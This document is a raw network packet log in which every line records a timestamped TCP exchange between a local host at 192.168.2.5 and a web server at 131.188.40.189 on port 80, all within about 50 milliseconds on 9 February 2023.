                      Feb 9, 2023 01:01:55.598043919 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598062992 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598073006 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598102093 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598129988 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598141909 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598157883 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598170996 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598186970 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598212004 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598236084 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598258972 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598278999 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598284960 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598310947 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598320961 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598336935 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598361015 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598370075 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598388910 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598416090 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598428965 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598448992 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598476887 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598505020 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598515034 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598535061 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598552942 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598566055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598596096 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598615885 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598623991 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598654985 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598663092 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598684072 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598731041 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598754883 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598761082 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598790884 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598818064 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598840952 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598845005 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598874092 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598885059 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598901987 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598927975 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598929882 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598958015 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598983049 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.598985910 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.598985910 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599009991 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599035978 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599059105 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599061012 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599087000 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599087954 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599116087 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599132061 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599143028 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599169970 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599196911 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599209070 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599225044 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599246025 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599252939 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599282980 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599292994 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599313021 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599339962 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599368095 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599379063 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599396944 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599420071 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.599426985 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.599467993 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620481014 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620527983 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620557070 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620583057 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620598078 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620621920 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620640039 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620651007 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620676041 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620702982 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620726109 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620729923 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620760918 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620786905 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620788097 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620810986 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620815039 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620842934 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620867014 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620867014 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620893955 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620918989 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620934963 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620945930 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620970011 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.620970964 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.620996952 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621021032 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621025085 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621052980 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621077061 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621092081 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621104002 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621129990 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621129990 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621156931 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621180058 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621181965 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621203899 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621229887 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621249914 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621256113 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621284008 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621284962 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621310949 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621334076 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621337891 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621365070 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621387959 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621412039 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621412992 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621436119 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621440887 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621467113 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621494055 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621494055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621524096 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621548891 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621573925 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621576071 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621603012 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621617079 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621629953 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621655941 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621676922 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621680975 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621709108 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621716976 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621737003 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621757030 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621762037 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621792078 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621808052 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621819973 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621844053 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621865988 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621870041 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621896982 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621921062 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.621922970 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621948957 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621974945 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.621994972 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622000933 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622025967 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622028112 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622055054 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622067928 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622082949 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622107983 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622133017 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622145891 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622160912 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622179985 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622189045 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622215033 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622229099 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622241974 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622267962 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622292042 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622296095 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622322083 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622347116 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622360945 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622375011 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622401953 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622406006 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622426987 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622452021 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622452021 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622481108 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622492075 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622508049 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622533083 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622561932 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622575045 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622587919 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622611046 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622615099 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622646093 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622670889 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622713089 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622735977 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622762918 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622788906 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622797966 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622814894 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622817993 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622843981 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622868061 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622868061 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622896910 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622905016 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622926950 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622955084 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.622966051 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.622982979 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623008966 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623022079 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623034954 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623059034 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623081923 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623095989 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623111963 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623133898 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623140097 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623169899 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623179913 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623199940 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623228073 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623255968 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623265028 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623285055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623300076 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623315096 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623344898 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623373032 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623383999 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623409986 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623424053 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623440981 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623470068 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623498917 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623509884 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623528004 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623541117 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623560905 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623589993 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623617887 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623640060 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623645067 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623668909 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.623672962 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.623713970 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.624252081 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.644766092 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644814014 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644840956 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644867897 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644885063 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.644896030 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644923925 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644938946 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.644953966 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.644980907 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.644983053 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645013094 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645028114 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645040989 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645067930 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645081043 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645096064 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645122051 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645148039 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645162106 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645176888 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645201921 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645205021 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645232916 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645256996 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645260096 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645287991 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645314932 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645330906 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645342112 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645364046 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645368099 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645391941 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645418882 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645428896 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645446062 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645469904 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645473957 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645513058 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645522118 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645546913 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645579100 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645608902 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645637035 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645637989 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645670891 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645673990 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645701885 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645733118 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645756006 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645764112 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645777941 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645796061 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645827055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645849943 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645859003 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645890951 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645899057 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.645924091 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645956039 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645986080 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.645994902 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646019936 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646035910 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646051884 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646085024 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646116972 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646142006 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646146059 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646169901 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646193027 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646217108 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646241903 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646255016 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646267891 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646291018 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646291971 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646317959 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646339893 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646343946 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646372080 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646380901 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646403074 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646431923 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646460056 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646475077 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646490097 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646512032 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646519899 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646548986 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646555901 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646579027 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646608114 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646636963 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646646023 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646667004 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646677971 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646713972 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646745920 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646773100 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646784067 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646800995 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646814108 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.646831036 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646858931 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.646883965 CET8049738131.188.40.189192.168.2.5
